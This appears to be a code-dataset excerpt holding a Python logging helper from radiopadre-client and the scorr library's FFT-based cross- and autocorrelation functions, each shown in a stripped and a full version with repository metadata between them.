cls = test_Photon
photon = cls.photon
print("Seeding photon:")
photon.set_seed(1234)
points = [1e3, 1.1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1.9e8, 1e9 ]
for E in points:
print(f"Running `_tripletproduction` for energy {E}eV")
k = E/0.5110e6
photon.k = E/0.5110e6
photon._tripletproduction()
if __name__ == '__main__':
ut.main()
| 3,654 | 0 | 174 |
ebc91893855d6f9b007c8a257640ae53da0985e3 | 5,108 | py | Python | iglesia/logger.py | ratt-ru/radiopadre-client | ef138860d22523bf08a847317f3daca363db65a3 | [
"MIT"
] | 1 | 2020-04-06T03:40:24.000Z | 2020-04-06T03:40:24.000Z | iglesia/logger.py | ratt-ru/radiopadre-client | ef138860d22523bf08a847317f3daca363db65a3 | [
"MIT"
] | 29 | 2020-01-24T09:47:37.000Z | 2022-03-02T18:00:46.000Z | iglesia/logger.py | ratt-ru/radiopadre-client | ef138860d22523bf08a847317f3daca363db65a3 | [
"MIT"
] | null | null | null | import sys, os.path, logging, time, atexit, glob
logger = None
logfile = sys.stderr
logfile_handler = None
NUM_RECENT_LOGS = 5
try:
PipeError = BrokenPipeError
except NameError: # for py2
PipeError = IOError
class TimestampFilter(logging.Filter):
"""Adds a timestamp attribute to the LogRecord, if enabled"""
time0 = time.time()
enable = False
class ColorizingFormatter(logging.Formatter):
"""This Formatter inserts color codes into the string according to severity"""
_default_format = "%(name)s%(timestamp)s: {<{<%(severity)s%(message)s>}>}"
_default_format_boring = "%(name)s%(timestamp)s: %(severity)s%(message)s"
_boring_formatter = logging.Formatter(_default_format_boring)
_colorful_formatter = ColorizingFormatter(_default_format)
_default_console_handler = MultiplexingHandler()
| 34.513514 | 119 | 0.658771 | import sys, os.path, logging, time, atexit, glob
logger = None
logfile = sys.stderr
logfile_handler = None
NUM_RECENT_LOGS = 5
try:
PipeError = BrokenPipeError
except NameError: # for py2
PipeError = IOError
class TimestampFilter(logging.Filter):
"""Adds a timestamp attribute to the LogRecord, if enabled"""
time0 = time.time()
enable = False
def filter(self, record):
if self.enable:
record.timestamp = " [{:.2f}s]".format(time.time() - self.time0)
else:
record.timestamp = ""
if record.levelno != logging.INFO:
record.severity = "{}: ".format(logging.getLevelName(record.levelno))
else:
record.severity = ""
return True
class MultiplexingHandler(logging.Handler):
def __init__(self, info_stream=sys.stdout, err_stream=sys.stderr):
super(MultiplexingHandler, self).__init__()
self.info_handler = logging.StreamHandler(info_stream)
self.err_handler = logging.StreamHandler(err_stream)
self.multiplex = True
def emit(self, record):
handler = self.err_handler if record.levelno > logging.INFO and self.multiplex else self.info_handler
handler.emit(record)
# ignore broken pipes, this often happens when cleaning up and exiting
try:
handler.flush()
except PipeError:
pass
def flush(self):
try:
self.err_handler.flush()
self.info_handler.flush()
except PipeError:
pass
def close(self):
self.err_handler.close()
self.info_handler.close()
def setFormatter(self, fmt):
self.err_handler.setFormatter(fmt)
self.info_handler.setFormatter(fmt)
class Colors():
WARNING = '\033[93m' if sys.stdin.isatty() else ''
ERROR = '\033[91m' if sys.stdin.isatty() else ''
BOLD = '\033[1m' if sys.stdin.isatty() else ''
GREEN = '\033[92m' if sys.stdin.isatty() else ''
ENDC = '\033[0m' if sys.stdin.isatty() else ''
class ColorizingFormatter(logging.Formatter):
"""This Formatter inserts color codes into the string according to severity"""
def format(self, record):
style = ""
if hasattr(record, 'color'):
style = getattr(Colors, record.color, "")
elif record.levelno >= logging.ERROR:
style = Colors.ERROR
elif record.levelno >= logging.WARNING:
style = Colors.WARNING
endstyle = Colors.ENDC if style else ""
msg = super(ColorizingFormatter, self).format(record)
return msg.replace("{<{<", style).replace(">}>}", endstyle)
_default_format = "%(name)s%(timestamp)s: {<{<%(severity)s%(message)s>}>}"
_default_format_boring = "%(name)s%(timestamp)s: %(severity)s%(message)s"
_boring_formatter = logging.Formatter(_default_format_boring)
_colorful_formatter = ColorizingFormatter(_default_format)
_default_console_handler = MultiplexingHandler()
def init(appname, timestamps=True, boring=False):
global logger
global _default_formatter
logging.basicConfig()
logger = logging.getLogger(appname)
TimestampFilter.enable = timestamps
logger.addFilter(TimestampFilter())
_default_console_handler.setFormatter(_boring_formatter if boring else _colorful_formatter)
logger.addHandler(_default_console_handler)
logger.setLevel(logging.INFO)
logger.propagate = False
return logger
def errors_to_stdout(enable=True):
_default_console_handler.multiplex = not enable
def enable_timestamps(enable=True):
TimestampFilter.enable = enable
def disable_printing():
logger.removeHandler(_default_console_handler)
def enable_logfile(logtype, verbose=False):
from .utils import make_dir, make_radiopadre_dir, ff
global logfile, logfile_handler
radiopadre_dir = make_radiopadre_dir()
make_dir(ff("{radiopadre_dir}/logs"))
datetime = time.strftime("%Y%m%d%H%M%S")
logname = os.path.expanduser(ff("{radiopadre_dir}/logs/log-{logtype}-{datetime}.txt"))
logfile = open(logname, 'wt')
logfile_handler = logging.StreamHandler(logfile)
logfile_handler.setFormatter(logging.Formatter(
"%(asctime)s: " + _default_format_boring,
"%Y-%m-%d %H:%M:%S"))
logger.addHandler(logfile_handler)
atexit.register(flush)
if verbose:
logger.info(ff("writing session log to {logname}"))
# clear most recent log files
recent_logs = sorted(glob.glob(ff("{radiopadre_dir}/logs/log-{logtype}-*.txt")))
if len(recent_logs) > NUM_RECENT_LOGS:
delete_logs = recent_logs[:-NUM_RECENT_LOGS]
if verbose:
logger.info(" (also deleting {} old log file(s) matching log-{}-*.txt)".format(len(delete_logs), logtype))
for oldlog in delete_logs:
try:
os.unlink(oldlog)
except Exception as exc:
if verbose:
logger.warning(ff(" failed to delete {oldlog}: {exc}"))
return logfile, logname
def flush():
if logfile_handler:
logfile_handler.flush()
| 3,626 | 291 | 371 |
b35665aaff7c116d6a6e30705950d837c5a5e85c | 17,041 | py | Python | scorr/corr2.py | felixpatzelt/scorr | c94838dca6ae0301f078da37e2f685ffeedbadf4 | [
"MIT"
] | 5 | 2020-01-22T11:38:32.000Z | 2021-05-16T18:25:51.000Z | scorr/corr2.py | felixpatzelt/scorr | c94838dca6ae0301f078da37e2f685ffeedbadf4 | [
"MIT"
] | null | null | null | scorr/corr2.py | felixpatzelt/scorr | c94838dca6ae0301f078da37e2f685ffeedbadf4 | [
"MIT"
] | 1 | 2020-01-22T11:38:34.000Z | 2020-01-22T11:38:34.000Z | """Functions to calculate two-point correlations.
"""
import numpy as np
import pandas as pd
from scipy.fftpack import fft, ifft
from scipy.linalg import toeplitz
try:
from progress import getLogger
except ImportError:
from logging import getLogger
from .helpers import is_number_like, is_string_like, get_nfft
# Helpers
# ===========================================================================
def corr_mat(x, maxlag=None):
"""Return correlation matrix from correlation array.
Parameters:
===========
x: array-like
Correlation array in the form returned by e.g. acorr, xcorr.
NOT centered!
maxlag: int
Maximum lag to consider (should be < len(x) / 2).
"""
# | c_0 c_1 ... c_L |
# | c_-1 c_0 ... |
# | ... |
# | c_-L ... c_0 |
if maxlag:
# topeliz(
# first_column(l=0,-1,-2,...,-maxlag), first_row(l=0,1,2,...,+maxlag)
# )
return toeplitz(np.concatenate([[x[0]], x[:-maxlag:-1]]), x[:maxlag])
else:
return toeplitz(np.concatenate([[x[0]], x[:0:-1]]), x)
def xcorrshift(x, maxlag=None, as_pandas=False):
"""Return shifted (cross- / auto) correlation to center lag zero."""
if not maxlag:
maxlag = len(x) // 2
# force pandas output?
if as_pandas and not hasattr(x, 'iloc'):
if len(np.shape(x)) > 1:
x = pd.DataFrame(x)
else:
x = pd.Series(x)
# slice
ix = np.arange(-maxlag, maxlag+1, dtype=int)
if hasattr(x, 'iloc'):
xs = x.iloc[ix]
xs.index = ix
else:
try:
xs = x[ix]
except:
xs = np.asanyarray(x)[ix]
return xs
def fftcrop(x, maxlag):
"""Return cropped fft or correlation (standard form starting at lag 0)."""
return np.concatenate([x[:maxlag], x[-maxlag:]])
def padded_xcorr_norm(nfft, pad, debias=False):
"""Return a vector of weights necessary to normalise xcorr
(cross-correlation) calculated with zero-padded ffts.
For pad = 0, all weights are equal to N.
Parameters:
===========
nfft: int
Length of the fft segment(s)
pad: int
Number of padded zeros
"""
ndat = nfft - pad
if pad <= 0:
w = nfft * np.ones(1)
elif debias:
nmp = max(1, ndat - pad)
w = np.concatenate([
np.arange(ndat,nmp, -1), # lag0, lag1, ...
nmp * np.ones(max(0, nfft - 2 * (ndat-nmp)+1)), # lags > ndat
np.arange(nmp+1, ndat,1) # ...lag-1
])
else:
w = ndat * np.ones(1)
return w
# For arrays
# ===========================================================================
def xcorr(
x, y,
norm='corr',
nfft='auto',
subtract_mean=True,
debias=False,
e=0
):
"""Return cross-correlation or covariance calculated using FFT.
Parameters:
-----------
x, y: array-like (1-D)
Time series to analyse.
norm: [optional]
How to normalise the result
"corr": Return correlation, i.e. r \\in [-1, 1] (default).
"cov": Return covariance. E.g. the peak of an autocorrelation
will have the height var(x) = var(y)
int, float:
Normalise result by this number.
nfft: int, str [optional]
How to set the length of the FFT (default: 'pad').
'len': Always use len(x), exact for periodic x, y.
'pad': Pad length to next number of two.
'demix': Zero-pad to demix causal and anti-causal part, giving
the exact result for an aperiodic signal.
'auto': Equal to 'len' for short series and 'pad' for long series
for better performance. This setting is appropriate when
the maximum lag of interest much smaller then half the signal
length.
int: Passed through to fft.
subtract_mean: bool [optional]
Subtract the signals' means (default: True).
debias: bool [optional]
True: Correct the bias from zero-padding if applicable.
This corresponds to the assumption that x, y are segments
of two stationary processes.
The SNR will decrease with |lag| because the number of
data points decreases.
False: Don't correct. This corresponds to the assumption that x and y
are zero outside of the observed range. As a consequence,
the correlation (or covariance) converges to zero for long lags.
Default: False because the bias is only significant compared to the
noise level when many short segments are averaged. It is also
consistent with similar functions like e.g. numpy.correlate.
e: float [optional]
Small epsilon to add to normalisation. This avoids e.g. blowing
up correlations when the variances of x, y are extremely small.
Default: 0.
Notes:
-----
The Fourier transform relies on the assumption that x and y are periodic.
This may create unexpected resuls for long lags in time series that are
shorter than the correlation length. To mitigate this effect, consider
nfft='pad'.
The output is uncentered, use xcorrshift to center.
The parameter combination
nfft='pad', norm=1, subtract_mean=False, debias=False
corresponds to numpy.correlate with mode='full'.
"""
lx = len(x)
assert lx == len(y), "Arrays must have the same length"
# padding for demixing and higher performance
crop_pad = False
if nfft == 'auto':
if lx >= 10**4:
nfft = 'pad'
else:
nfft = 'len'
if nfft == 'demix':
nfft = int(2**(np.ceil(np.log2(len(x))) + 1))
crop_pad = True
elif nfft == 'pad':
nfft = int(2**(np.ceil(np.log2(len(x)))))
crop_pad = True
elif nfft == 'len':
nfft = lx
else:
assert nfft == int(nfft), "nfft must be either 'pad', 'len', or an int"
#print "xcorr nfft:", nfft
# flatten arrays to 1 dimension, extracts values from pd.Dataframe too
x = np.ravel(x)
y = np.ravel(y)
# fourier transform of x
if subtract_mean:
# normally the mean is subtracted from the signal
x = x-np.mean(x)
xfft = fft(x, n=nfft)
# fourier transform of y
if x is y:
yfft = xfft
else:
if subtract_mean:
y = y-np.mean(y)
yfft = fft(y, n=nfft)
# inverse transform
r = np.real(ifft(xfft * np.conjugate(yfft)))
del xfft, yfft
# normalisation
ly = padded_xcorr_norm(nfft, nfft - len(y), debias=debias)
if norm == "cov":
n = ly
elif is_number_like(norm):
n = np.asanyarray(norm, dtype=float)
else:
n = ly
if x is y:
n *= np.var(x)
else:
n *= np.std(x) * np.std(y)
# done
r = r / (n + e)
if crop_pad:
r = fftcrop(r, lx)
return r
def acorr(y, **kwargs):
"""Return autocorrelation, equivalent to xcorr(y,y, **kwargs).
See xcorr for documentation.
"""
r = xcorr(y, y, **kwargs)
return r
# For pandas
# ===========================================================================
def xcorr_grouped_df(
df,
cols,
by = 'date',
nfft = 'pad',
funcs = (lambda x: x, lambda x: x),
subtract_mean = 'total',
norm = 'total',
return_df = True,
debias = True,
**kwargs
):
"""Group dataframe and calc cross correlation for each group separately.
Returns: mean and std over groups.
Parameters:
===========
df: pandas.DataFrame
input time series, must include the columns
for which we calculate the xcorr and the one by which we group.
cols: list of str
colums with the time series' of interest.
by: str [optional]
column by which to group. default: 'date'
nfft: int, str [optional]
Twice the maximal lag measured. default: 'pad'
'len': use smallest group size.
'pad > 100': zero pad to next power of two of smallest froup size
larger than 100. I.e. at least 128.
... see get_nfft for more details
funcs: list of functions [optional]
functions to apply to cols before calculating the xcorr.
default: identity (lambda x: x)
subtract_mean: str [optional]
what to subtract from the time series before calculating the
autocorr.
'total': subtract mean of the whole series from each group
'group': subtract group mean from each group
None: subtract nothing
default: 'total'
norm: str [optional]
Normalisation. default: 'total' (normalise normalise days to cov,
the end result by total cov giving approx. a correlation.)
Other Values are passed to xcorr and used on each day separately.
return_df: bool
Return a pandas.DataFrame. Default: True.
debias: bool [optional]
True: Correct the bias from zero-padding if applicable (default).
False: Don't debias.
**kwargs are passed through. see also: acorr, xcorr, acorr_grouped_df
"""
# group, allocate, slice
g = df.groupby(by)
# we always need columns
cols = list(cols)
df = df[np.unique(cols)]
g = g[cols]
# determine fft segment size
nfft, events_required = get_nfft(nfft, g)
maxlag = int(min(nfft//2, events_required))
# allocate
acd = np.zeros((2*maxlag, len(g)))
# what to subtract
fdf0 = None
fdf1 = None
if subtract_mean in ('total', 'auto'):
# must match normalisation code below
fdf0 = funcs[0](df[cols[0]])
fdf1 = funcs[1](df[cols[1]])
subtract = [
fdf0.mean(),
fdf1.mean(),
]
sm = False
elif subtract_mean in ('group', 'each', True, by):
subtract = [0,0]
sm = True
else:
subtract = [0,0]
sm = False
# which norm for each day?
if norm in ("total", "auto"):
# calculate covariances for each day and later divide by global cov.
nd = 'cov'
else:
nd = norm
# do it
discarded_days = 0
for i, (gk, gs) in enumerate(g):
if len(gs) < events_required:
# this day is too short
discarded_days += 1
continue
else:
x = np.zeros(nfft)
# average over minimally overlapping segments
nit = int(np.ceil(len(gs) / float(nfft)))
tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
for j in range(nit):
x += xcorr(
funcs[0](gs[cols[0]][tj[j]:tj[j]+nfft]) - subtract[0],
funcs[1](gs[cols[1]][tj[j]:tj[j]+nfft]) - subtract[1],
subtract_mean=sm,
norm = nd,
nfft = nfft,
debias = debias,
**kwargs
)
acd[:,i] = fftcrop(x / nit, maxlag)
del x
# average
acdm = acd.mean(axis=1)
acde = acd.std(axis=1)
n = 1.
if norm in ("total", "auto"):
if fdf0 is None:
# maybe we didn't calculate these yet
# must match subtract code above!
fdf0 = funcs[0](df[cols[0]])
fdf1 = funcs[1](df[cols[1]])
# from cross covariance to cross correlation
n = 1./(np.std(fdf0) * np.std(fdf1))
if discarded_days:
getLogger(__name__).info(
"Discarded %i %ss < %i events" % (
discarded_days, by, events_required
)
)
n *= len(g) / float(len(g) - discarded_days)
acdm *= n
acde *= n
# done
if return_df:
lag = pd.Index(list(range(-maxlag,maxlag+1)), name='lag')
return pd.DataFrame({
'xcorr': xcorrshift(acdm, maxlag),
'xcorr_std': xcorrshift(acde, maxlag),
}, index=lag)
else:
return acdm, acde
def acorr_grouped_df(
df,
col = None,
by = 'date',
nfft = 'pad',
func = lambda x: x,
subtract_mean = 'total',
norm = 'total',
return_df = True,
debias = True,
**kwargs
):
"""Group dataframe and calc autocorrelation for each group separately.
Returns: mean and std over groups for positive lags only.
Parameters:
===========
df: pandas.DataFrame, pandas.Series
input time series. If by is a string, df must include the column
for which we calculate the autocorr and the one by which we group.
If by is a series, df can be a series, too.
col: str, None [optional]
column with the time series of interest.
by: str [optional]
column by which to group. default: 'date'
nfft: int, str [optional]
twice the maximal lag measured. default: 'auto'
'auto': use smallest group size.
'auto pad > 100': zero pad to segments of length >= 200,
skip days with fewer events
func: function [optional]
function to apply to col before calculating the autocorr.
default: identity.
subtract_mean: str [optional]
what to subtract from the time series before calculating the
autocorr.
'total': subtract mean of the whole series from each group
'group': subtract group mean from each group
None: subtract nothing
default: 'total'
norm: str [optional]
default: 'total' (normalise mean response to one at lag zero).
Other values
debias: bool [optional]
True: Correct the bias from zero-padding if applicable (default).
False: Don't debias.
**kwargs are passed through. see also: acorr, xcorr, xcorr_grouped_df
"""
# group, allocate, slice
g = df.groupby(by)
if not col:
if (
is_string_like(by)
and hasattr(df, 'columns')
and by in df.columns
):
# we just got two columns, one is group, so it's clear what to do
col = list(df.columns)
col.remove(by)
elif len(df.shape) > 1:
# unclear what to do
raise ValueError
# determine fft segment size
nfft, events_required = get_nfft(nfft, g)
maxlag = int(min(nfft//2, events_required))
# allocate
acd = np.zeros((maxlag + 1, len(g)))
# what to subtract
fdf = None
if subtract_mean in ('total', 'auto'):
subtract = func(df[col]).mean()
sm = False
elif subtract_mean in ('group', 'each', True, by):
subtract = 0
sm = True
else:
subtract = 0
sm = False
# which norm for each day?
if norm in ("total", "auto"):
# calculate covariances for each day, later norm to one giving a corr.
nd = 'cov'
else:
nd = norm
# do it
discarded_days = 0
for i, (gk, gs) in enumerate(g):
if len(gs) < events_required:
# this day is too short
discarded_days += 1
continue
else:
x = np.zeros(maxlag+1)
# average over minimally overlapping segments
nit = int(np.ceil(len(gs) / float(nfft)))
tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
for j in range(nit):
x += acorr(
func(gs[col][tj[j]:tj[j]+nfft]) - subtract,
subtract_mean=sm,
norm = nd,
nfft = nfft,
debias = debias,
**kwargs
)[:maxlag+1]
acd[:,i] = x / nit
del x
# average
acdm = acd.mean(axis=1)
acde = acd.std(axis=1)
n = 1
if norm in ("total", "auto"):
# norm to one
n = 1./acdm[0]
elif discarded_days:
n = len(g) / float(len(g) - discarded_days)
if discarded_days:
getLogger(__name__).info(
"Discarded %i %ss < %i events" % (
discarded_days, by, events_required
)
)
acdm *= n
acde *= n
# done
if return_df:
lag = pd.Index(list(range(maxlag+1)), name='lag')
return pd.DataFrame({
'acorr': acdm,
'acorr_std': acde,
}, index=lag)
else:
return acdm, acde
| 31.383057 | 79 | 0.529957 | """Functions to calculate two-point correlations.
"""
import numpy as np
import pandas as pd
from scipy.fftpack import fft, ifft
from scipy.linalg import toeplitz
try:
from progress import getLogger
except ImportError:
from logging import getLogger
from .helpers import is_number_like, is_string_like, get_nfft
# Helpers
# ===========================================================================
def corr_mat(x, maxlag=None):
"""Return correlation matrix from correlation array.
Parameters:
===========
x: array-like
Correlation array in the form returned by e.g. acorr, xcorr.
NOT centered!
maxlag: int
Maximum lag to consider (should be < len(x) / 2).
"""
# | c_0 c_1 ... c_L |
# | c_-1 c_0 ... |
# | ... |
# | c_-L ... c_0 |
if maxlag:
# topeliz(
# first_column(l=0,-1,-2,...,-maxlag), first_row(l=0,1,2,...,+maxlag)
# )
return toeplitz(np.concatenate([[x[0]], x[:-maxlag:-1]]), x[:maxlag])
else:
return toeplitz(np.concatenate([[x[0]], x[:0:-1]]), x)
def xcorrshift(x, maxlag=None, as_pandas=False):
"""Return shifted (cross- / auto) correlation to center lag zero."""
if not maxlag:
maxlag = len(x) // 2
# force pandas output?
if as_pandas and not hasattr(x, 'iloc'):
if len(np.shape(x)) > 1:
x = pd.DataFrame(x)
else:
x = pd.Series(x)
# slice
ix = np.arange(-maxlag, maxlag+1, dtype=int)
if hasattr(x, 'iloc'):
xs = x.iloc[ix]
xs.index = ix
else:
try:
xs = x[ix]
except:
xs = np.asanyarray(x)[ix]
return xs
def fftcrop(x, maxlag):
"""Return cropped fft or correlation (standard form starting at lag 0)."""
return np.concatenate([x[:maxlag], x[-maxlag:]])
def padded_xcorr_norm(nfft, pad, debias=False):
"""Return a vector of weights necessary to normalise xcorr
(cross-correlation) calculated with zero-padded ffts.
For pad = 0, all weights are equal to N.
Parameters:
===========
nfft: int
Length of the fft segment(s)
pad: int
Number of padded zeros
"""
ndat = nfft - pad
if pad <= 0:
w = nfft * np.ones(1)
elif debias:
nmp = max(1, ndat - pad)
w = np.concatenate([
np.arange(ndat,nmp, -1), # lag0, lag1, ...
nmp * np.ones(max(0, nfft - 2 * (ndat-nmp)+1)), # lags > ndat
np.arange(nmp+1, ndat,1) # ...lag-1
])
else:
w = ndat * np.ones(1)
return w
# For arrays
# ===========================================================================
def xcorr(
x, y,
norm='corr',
nfft='auto',
subtract_mean=True,
debias=False,
e=0
):
"""Return cross-correlation or covariance calculated using FFT.
Parameters:
-----------
x, y: array-like (1-D)
Time series to analyse.
norm: [optional]
How to normalise the result
"corr": Return correlation, i.e. r \\in [-1, 1] (default).
"cov": Return covariance. E.g. the peak of an autocorrelation
will have the height var(x) = var(y)
int, float:
Normalise result by this number.
nfft: int, str [optional]
How to set the length of the FFT (default: 'pad').
'len': Always use len(x), exact for periodic x, y.
'pad': Pad length to next number of two.
'demix': Zero-pad to demix causal and anti-causal part, giving
the exact result for an aperiodic signal.
'auto': Equal to 'len' for short series and 'pad' for long series
for better performance. This setting is appropriate when
the maximum lag of interest much smaller then half the signal
length.
int: Passed through to fft.
subtract_mean: bool [optional]
Subtract the signals' means (default: True).
debias: bool [optional]
True: Correct the bias from zero-padding if applicable.
This corresponds to the assumption that x, y are segments
of two stationary processes.
The SNR will decrease with |lag| because the number of
data points decreases.
False: Don't correct. This corresponds to the assumption that x and y
are zero outside of the observed range. As a consequence,
the correlation (or covariance) converges to zero for long lags.
Default: False because the bias is only significant compared to the
noise level when many short segments are averaged. It is also
consistent with similar functions like e.g. numpy.correlate.
e: float [optional]
Small epsilon to add to normalisation. This avoids e.g. blowing
up correlations when the variances of x, y are extremely small.
Default: 0.
Notes:
-----
The Fourier transform relies on the assumption that x and y are periodic.
This may create unexpected resuls for long lags in time series that are
shorter than the correlation length. To mitigate this effect, consider
nfft='pad'.
The output is uncentered, use xcorrshift to center.
The parameter combination
nfft='pad', norm=1, subtract_mean=False, debias=False
corresponds to numpy.correlate with mode='full'.
"""
lx = len(x)
assert lx == len(y), "Arrays must have the same length"
# padding for demixing and higher performance
crop_pad = False
if nfft == 'auto':
if lx >= 10**4:
nfft = 'pad'
else:
nfft = 'len'
if nfft == 'demix':
nfft = int(2**(np.ceil(np.log2(len(x))) + 1))
crop_pad = True
elif nfft == 'pad':
nfft = int(2**(np.ceil(np.log2(len(x)))))
crop_pad = True
elif nfft == 'len':
nfft = lx
else:
assert nfft == int(nfft), "nfft must be either 'pad', 'len', or an int"
#print "xcorr nfft:", nfft
# flatten arrays to 1 dimension, extracts values from pd.Dataframe too
x = np.ravel(x)
y = np.ravel(y)
# fourier transform of x
if subtract_mean:
# normally the mean is subtracted from the signal
x = x-np.mean(x)
xfft = fft(x, n=nfft)
# fourier transform of y
if x is y:
yfft = xfft
else:
if subtract_mean:
y = y-np.mean(y)
yfft = fft(y, n=nfft)
# inverse transform
r = np.real(ifft(xfft * np.conjugate(yfft)))
del xfft, yfft
# normalisation
ly = padded_xcorr_norm(nfft, nfft - len(y), debias=debias)
if norm == "cov":
n = ly
elif is_number_like(norm):
n = np.asanyarray(norm, dtype=float)
else:
n = ly
if x is y:
n *= np.var(x)
else:
n *= np.std(x) * np.std(y)
# done
r = r / (n + e)
if crop_pad:
r = fftcrop(r, lx)
return r
def acorr(y, **kwargs):
"""Return autocorrelation, equivalent to xcorr(y,y, **kwargs).
See xcorr for documentation.
"""
r = xcorr(y, y, **kwargs)
return r
# For pandas
# ===========================================================================
def xcorr_grouped_df(
df,
cols,
by = 'date',
nfft = 'pad',
funcs = (lambda x: x, lambda x: x),
subtract_mean = 'total',
norm = 'total',
return_df = True,
debias = True,
**kwargs
):
"""Group dataframe and calc cross correlation for each group separately.
Returns: mean and std over groups.
Parameters:
===========
df: pandas.DataFrame
input time series, must include the columns
for which we calculate the xcorr and the one by which we group.
cols: list of str
colums with the time series' of interest.
by: str [optional]
column by which to group. default: 'date'
nfft: int, str [optional]
Twice the maximal lag measured. default: 'pad'
'len': use smallest group size.
'pad > 100': zero pad to next power of two of smallest froup size
larger than 100. I.e. at least 128.
... see get_nfft for more details
funcs: list of functions [optional]
functions to apply to cols before calculating the xcorr.
default: identity (lambda x: x)
subtract_mean: str [optional]
what to subtract from the time series before calculating the
autocorr.
'total': subtract mean of the whole series from each group
'group': subtract group mean from each group
None: subtract nothing
default: 'total'
norm: str [optional]
Normalisation. default: 'total' (normalise normalise days to cov,
the end result by total cov giving approx. a correlation.)
Other Values are passed to xcorr and used on each day separately.
return_df: bool
Return a pandas.DataFrame. Default: True.
debias: bool [optional]
True: Correct the bias from zero-padding if applicable (default).
False: Don't debias.
**kwargs are passed through. see also: acorr, xcorr, acorr_grouped_df
"""
# group, allocate, slice
g = df.groupby(by)
# we always need columns
cols = list(cols)
df = df[np.unique(cols)]
g = g[cols]
# determine fft segment size
nfft, events_required = get_nfft(nfft, g)
maxlag = int(min(nfft//2, events_required))
# allocate
acd = np.zeros((2*maxlag, len(g)))
# what to subtract
fdf0 = None
fdf1 = None
if subtract_mean in ('total', 'auto'):
# must match normalisation code below
fdf0 = funcs[0](df[cols[0]])
fdf1 = funcs[1](df[cols[1]])
subtract = [
fdf0.mean(),
fdf1.mean(),
]
sm = False
elif subtract_mean in ('group', 'each', True, by):
subtract = [0,0]
sm = True
else:
subtract = [0,0]
sm = False
# which norm for each day?
if norm in ("total", "auto"):
# calculate covariances for each day and later divide by global cov.
nd = 'cov'
else:
nd = norm
# do it
discarded_days = 0
for i, (gk, gs) in enumerate(g):
if len(gs) < events_required:
# this day is too short
discarded_days += 1
continue
else:
x = np.zeros(nfft)
# average over minimally overlapping segments
nit = int(np.ceil(len(gs) / float(nfft)))
tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
for j in range(nit):
x += xcorr(
funcs[0](gs[cols[0]][tj[j]:tj[j]+nfft]) - subtract[0],
funcs[1](gs[cols[1]][tj[j]:tj[j]+nfft]) - subtract[1],
subtract_mean=sm,
norm = nd,
nfft = nfft,
debias = debias,
**kwargs
)
acd[:,i] = fftcrop(x / nit, maxlag)
del x
# average
acdm = acd.mean(axis=1)
acde = acd.std(axis=1)
n = 1.
if norm in ("total", "auto"):
if fdf0 is None:
# maybe we didn't calculate these yet
# must match subtract code above!
fdf0 = funcs[0](df[cols[0]])
fdf1 = funcs[1](df[cols[1]])
# from cross covariance to cross correlation
n = 1./(np.std(fdf0) * np.std(fdf1))
if discarded_days:
getLogger(__name__).info(
"Discarded %i %ss < %i events" % (
discarded_days, by, events_required
)
)
n *= len(g) / float(len(g) - discarded_days)
acdm *= n
acde *= n
# done
if return_df:
lag = pd.Index(list(range(-maxlag,maxlag+1)), name='lag')
return pd.DataFrame({
'xcorr': xcorrshift(acdm, maxlag),
'xcorr_std': xcorrshift(acde, maxlag),
}, index=lag)
else:
return acdm, acde
def acorr_grouped_df(
df,
col = None,
by = 'date',
nfft = 'pad',
func = lambda x: x,
subtract_mean = 'total',
norm = 'total',
return_df = True,
debias = True,
**kwargs
):
"""Group dataframe and calc autocorrelation for each group separately.
Returns: mean and std over groups for positive lags only.
Parameters:
===========
df: pandas.DataFrame, pandas.Series
input time series. If by is a string, df must include the column
for which we calculate the autocorr and the one by which we group.
If by is a series, df can be a series, too.
col: str, None [optional]
column with the time series of interest.
by: str [optional]
column by which to group. default: 'date'
nfft: int, str [optional]
twice the maximal lag measured. default: 'auto'
'auto': use smallest group size.
'auto pad > 100': zero pad to segments of length >= 200,
skip days with fewer events
func: function [optional]
function to apply to col before calculating the autocorr.
default: identity.
subtract_mean: str [optional]
what to subtract from the time series before calculating the
autocorr.
'total': subtract mean of the whole series from each group
'group': subtract group mean from each group
None: subtract nothing
default: 'total'
norm: str [optional]
default: 'total' (normalise mean response to one at lag zero).
Other values
debias: bool [optional]
True: Correct the bias from zero-padding if applicable (default).
False: Don't debias.
**kwargs are passed through. see also: acorr, xcorr, xcorr_grouped_df
"""
# group, allocate, slice
g = df.groupby(by)
if not col:
if (
is_string_like(by)
and hasattr(df, 'columns')
and by in df.columns
):
# we just got two columns, one is group, so it's clear what to do
col = list(df.columns)
col.remove(by)
elif len(df.shape) > 1:
# unclear what to do
raise ValueError
# determine fft segment size
nfft, events_required = get_nfft(nfft, g)
maxlag = int(min(nfft//2, events_required))
# allocate
acd = np.zeros((maxlag + 1, len(g)))
# what to subtract
fdf = None
if subtract_mean in ('total', 'auto'):
subtract = func(df[col]).mean()
sm = False
elif subtract_mean in ('group', 'each', True, by):
subtract = 0
sm = True
else:
subtract = 0
sm = False
# which norm for each day?
if norm in ("total", "auto"):
# calculate covariances for each day, later norm to one giving a corr.
nd = 'cov'
else:
nd = norm
# do it
discarded_days = 0
for i, (gk, gs) in enumerate(g):
if len(gs) < events_required:
# this day is too short
discarded_days += 1
continue
else:
x = np.zeros(maxlag+1)
# average over minimally overlapping segments
nit = int(np.ceil(len(gs) / float(nfft)))
tj = np.unique(np.linspace(0, len(gs)-nfft, nit, dtype=int))
for j in range(nit):
x += acorr(
func(gs[col][tj[j]:tj[j]+nfft]) - subtract,
subtract_mean=sm,
norm = nd,
nfft = nfft,
debias = debias,
**kwargs
)[:maxlag+1]
acd[:,i] = x / nit
del x
# average
acdm = acd.mean(axis=1)
acde = acd.std(axis=1)
n = 1
if norm in ("total", "auto"):
# norm to one
n = 1./acdm[0]
elif discarded_days:
n = len(g) / float(len(g) - discarded_days)
if discarded_days:
getLogger(__name__).info(
"Discarded %i %ss < %i events" % (
discarded_days, by, events_required
)
)
acdm *= n
acde *= n
# done
if return_df:
lag = pd.Index(list(range(maxlag+1)), name='lag')
return pd.DataFrame({
'acorr': acdm,
'acorr_std': acde,
}, index=lag)
else:
return acdm, acde
| 0 | 0 | 0 |
31ebe613b5c99ee717124c5b426eb1e60a2277e3 | 938 | py | Python | modules/surface_matching/samples/ppf_load_match.py | ptelang/opencv_contrib | dd68e396c76f1db4d82e5aa7a6545580939f9b9d | [
"Apache-2.0"
